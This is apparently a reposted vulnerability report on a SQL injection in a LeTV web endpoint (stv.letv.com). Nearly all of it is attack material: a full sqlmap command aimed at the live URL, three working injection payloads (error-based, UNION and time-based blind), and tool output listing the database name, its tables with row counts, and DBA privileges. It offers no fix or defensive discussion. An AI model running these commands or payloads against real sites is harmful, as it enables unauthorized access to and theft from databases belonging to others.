Repost

High-Severity SQL Injection Vulnerability in LeTV (letv.com)

Tested with sqlmap:

sqlmap -u "http://stv.letv.com/w/m/supportmatch.action?mid=*&uid=null" --dbms=MySQL --risk=3 --level=5 --count --threads=10

Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: http://stv.letv.com:80/w/m/supportmatch.action?mid=-5187) OR (SELECT 7463 FROM(SELECT COUNT(*),CONCAT(0x716e637671,(SELECT (CASE WHEN (7463=7463) THEN 1 ELSE 0 END)),0x716f696971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1178=1178&uid=null

Type: UNION query
Title: MySQL UNION query (random number) - 4 columns
Payload: http://stv.letv.com:80/w/m/supportmatch.action?mid=-3941) UNION ALL SELECT CONCAT(0x716e637671,0x524a4a72637862494f4d,0x716f696971),8473,8473,8473#&uid=null

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://stv.letv.com:80/w/m/supportmatch.action?mid=-2026) OR 5639=SLEEP(5) AND (2828=2828&uid=null
---
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
Database: sodaweb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| w1_t_login_log                        | 288     |
| t_match_support                       | 156     |
| t_match_support_det                   | 90      |
| w1_t_binding_weibo                    | 70      |
| t_match                               | 64      |
| test_t_comment                        | 55      |
| t_player_support                      | 38      |
| t_team_support                        | 34      |
| t_player_support_det                  | 29      |
| t_comment                             | 26      |
current user is DBA: True